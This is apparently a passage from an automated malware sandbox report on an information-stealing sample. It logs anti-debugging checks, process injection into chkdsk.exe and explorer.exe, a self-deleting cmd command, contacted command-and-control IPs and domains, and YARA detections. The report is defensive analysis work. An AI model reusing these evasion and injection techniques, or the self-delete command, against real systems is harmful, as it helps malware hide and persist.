          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_0169AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_0169AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_0169AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_0169AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_0169AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_0168B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_0168B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_0168B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_0168B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_0168B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_0168B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_0168B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_0168B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_0168B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_0168B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_0168B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_0168B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_0169A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_016FC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_016FC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_0169BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_016E6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_016E6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_016E6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_016E6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_01721C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_01721C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_01721C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_01721C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_01721C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_01721C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_01721C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_01721C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_01721C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_01721C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_01721C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_01721C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_01721C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_01721C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_0173740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_0173740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_0173740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_017214FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_016E6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_016E6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_016E6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_01738CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_01724496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_01724496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_01724496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_01724496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_01724496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_01724496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_01724496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_01724496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_01724496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_01724496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_01724496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_01724496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_01724496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_0167849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_0167FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_01738F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_0167EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_01664F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01664F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168B73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168B73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0169E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0169A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0169A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0173070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0173070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016FFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016FFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016A37F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01678794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016E7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016E7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016E7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0167766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01677E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01677E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01677E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01677E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01677E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01677E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0172AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0172AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0166E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0171FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0166C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0166C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0166C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01698E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0169A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0169A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01721608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016776E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016916E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01738ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016936CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016A8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0171FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016E46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01730EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01730EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01730EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016FFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 16_2_05433540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 16_2_053E4D3B mov eax, dword ptr fs:[00000030h] (3 identical entries)
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 16_2_05463D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 16_2_053C3D34 mov eax, dword ptr fs:[00000030h] (13 identical entries)
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 16_2_053BAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 16_2_053DC577 mov eax, dword ptr fs:[00000030h] (2 identical entries)
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 16_2_053D7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 16_2_0543A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 16_2_05488D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 16_2_053F3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 16_2_0547E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 16_2_05436DC9 mov eax, dword ptr fs:[00000030h] (3 identical entries)
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 16_2_05436DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 16_2_05436DC9 mov eax, dword ptr fs:[00000030h] (2 identical entries)
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 16_2_053E1DB5 mov eax, dword ptr fs:[00000030h] (3 identical entries)
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 16_2_053E35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 16_2_053EFD9B mov eax, dword ptr fs:[00000030h] (2 identical entries)
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 16_2_0547FDE2 mov eax, dword ptr fs:[00000030h] (4 identical entries)
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 16_2_053B2D8A mov eax, dword ptr fs:[00000030h] (5 identical entries)
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 16_2_05468DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 16_2_053E2581 mov eax, dword ptr fs:[00000030h] (4 identical entries)
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 16_2_053CD5E0 mov eax, dword ptr fs:[00000030h] (2 identical entries)
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 16_2_054805AC mov eax, dword ptr fs:[00000030h] (2 identical entries)
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 16_2_053EBC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 16_2_0544C450 mov eax, dword ptr fs:[00000030h] (2 identical entries)
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 16_2_05471C06 mov eax, dword ptr fs:[00000030h] (14 identical entries)
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 16_2_0548740D mov eax, dword ptr fs:[00000030h] (3 identical entries)
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 16_2_05436C0A mov eax, dword ptr fs:[00000030h] (4 identical entries)
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 16_2_053D746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 16_2_053EA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 16_2_05488CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 16_2_053C849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 16_2_05436CF0 mov eax, dword ptr fs:[00000030h] (3 identical entries)
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 16_2_054714FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 16_2_053EE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 16_2_053B4F2E mov eax, dword ptr fs:[00000030h] (2 identical entries)
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 16_2_05488F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 16_2_053DF716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 16_2_053EA70E mov eax, dword ptr fs:[00000030h] (2 identical entries)
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 16_2_0548070D mov eax, dword ptr fs:[00000030h] (2 identical entries)
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 16_2_0544FF10 mov eax, dword ptr fs:[00000030h] (2 identical entries)
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 16_2_053CFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 16_2_053CEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 16_2_053C8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 16_2_053F37F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 16_2_05437794 mov eax, dword ptr fs:[00000030h] (3 identical entries)
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 16_2_0547AE44 mov eax, dword ptr fs:[00000030h] (2 identical entries)
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 16_2_053BE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 16_2_053EA61C mov eax, dword ptr fs:[00000030h] (2 identical entries)
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 16_2_053BC600 mov eax, dword ptr fs:[00000030h] (2 identical entries)
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe | Process queried: DebugPort
          Source: C:\Windows\SysWOW64\chkdsk.exe | Process queried: DebugPort
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe | Code function: 2_2_0040ACF0 LdrLoadDll,
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe | Code function: 1_2_003B439B SetUnhandledExceptionFilter,
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe | Code function: 1_2_003B43CC SetUnhandledExceptionFilter,UnhandledExceptionFilter,
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe | Code function: 2_2_003B439B SetUnhandledExceptionFilter,
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe | Code function: 2_2_003B43CC SetUnhandledExceptionFilter,UnhandledExceptionFilter,

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Windows\explorer.exe | Network Connect: 188.114.96.10 80
          Source: C:\Windows\explorer.exe | Network Connect: 154.85.152.171 80
          Source: C:\Windows\explorer.exe | Domain query: www.informacion-numero-24-h.site
          Source: C:\Windows\explorer.exe | Domain query: www.tzjisheng.com
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe | Section unmapped: C:\Windows\SysWOW64\chkdsk.exe base address: 1040000
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe | Section loaded: unknown target: C:\Windows\SysWOW64\chkdsk.exe protection: execute and read and write (2 identical entries)
          Source: C:\Windows\SysWOW64\chkdsk.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\chkdsk.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe | Thread APC queued: target process: C:\Windows\explorer.exe
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe | Thread register set: target process: 3968
          Source: C:\Windows\SysWOW64\chkdsk.exe | Thread register set: target process: 3968
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe | Process created: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe C:\Users\user\AppData\Local\Temp\naxsk
          Source: C:\Windows\SysWOW64\chkdsk.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe"
          Source: explorer.exe, 00000005.00000000.255915814.0000000000688000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.278458875.0000000000688000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.295991072.0000000000688000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ProgmanEXE^
          Source: explorer.exe, 00000005.00000000.278690681.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.265115735.00000000080ED000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.301324707.0000000005920000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000005.00000000.278690681.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.256196895.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.370103670.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
          Source: explorer.exe, 00000005.00000000.278690681.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.256196895.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.370103670.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
          Source: explorer.exe, 00000005.00000000.369902961.000000000069D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.278476010.000000000069D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.255927905.000000000069D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Shell_TrayWnd4
          Source: explorer.exe, 00000005.00000000.278690681.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.256196895.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.370103670.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: WProgram Manager
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe | Code function: 1_2_003B3283 cpuid
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe | Code function: 1_2_003B3EC8 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,
          Source: C:\Users\user\Desktop\inlaww321345.exe | Code function: 0_2_00403646 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

          Stealing of Sensitive Information

          Source: Yara match | File source: 2.2.idczzzzbpy.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.2.idczzzzbpy.exe.700000.1.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.0.idczzzzbpy.exe.400000.7.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.0.idczzzzbpy.exe.400000.9.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.0.idczzzzbpy.exe.400000.7.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.2.idczzzzbpy.exe.700000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.0.idczzzzbpy.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.0.idczzzzbpy.exe.400000.9.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.2.idczzzzbpy.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000010.00000002.507327019.0000000000970000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.319433695.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000000.246864810.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000000.289205800.000000000AC3C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000000.306971961.000000000AC3C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.319619508.0000000001180000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000010.00000002.507830951.0000000000F50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000002.251263067.0000000000700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000000.248745140.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
